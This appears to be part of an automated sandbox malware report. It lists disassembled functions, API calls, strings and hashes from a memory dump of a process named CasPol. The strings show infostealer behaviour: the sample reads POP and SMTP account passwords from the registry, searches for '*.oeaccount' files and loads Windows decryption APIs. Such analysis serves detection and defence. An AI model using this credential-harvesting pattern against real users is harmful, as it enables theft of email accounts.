                                                                                                                                                                                    Function 004029A2 Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1208763047-0
                                                                                                                                                                                    • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                    • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                    Function 00402A9D Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                      • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Closememset$EnumOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1938129365-0
                                                                                                                                                                                    • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                    • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                    • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                                                                    Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                    Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                    Function 00410B62 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2928410991-0
                                                                                                                                                                                    • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                    • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                    Function 00410ADD Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                    • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                    • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                    Function 00407560 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                    • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                    Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                    Function 0040C580 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0040CF3F,00000000,00000000,00000000,?,?,0040D05D), ref: 0040C591
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                    • Instruction ID: 388ad9edf2a2a7c68189f8b324949551c1d57bd7625714ace597e57fc5aec2ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77B09B7681A53096D43577153405BDE135C9FD575474701EBB5043B28545187D4141DD
                                                                                                                                                                                    Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                    Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                    Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                    Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                    Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                    • API String ID: 2238633743-192783356
                                                                                                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                    Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                    • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                    • API String ID: 52435246-1534328989
                                                                                                                                                                                    • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                    • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                    Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                    • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                    • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                    Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3116012682-0
                                                                                                                                                                                    • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                    • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
